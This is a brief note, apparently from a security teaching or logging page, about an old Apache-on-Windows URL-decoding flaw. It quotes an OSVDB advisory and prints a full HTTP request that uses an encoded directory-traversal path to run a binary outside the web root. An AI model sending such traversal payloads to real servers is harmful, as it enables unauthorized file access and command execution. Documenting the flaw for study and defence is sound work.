Apache on Windows
URL decoding error
Remote access
OSVDB
From the OSVDB page:
Apache Win32 contains a flaw that allows a remote attacker to access arbitrary files and execute arbitrary binaries outside of the web path. The issue is due to the server not properly sanitizing user input, specifically encoded traversal style attacks (../../) supplied via the URI.
GET /cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO HTTP/1.1 Host: www.i-pi.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040114 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive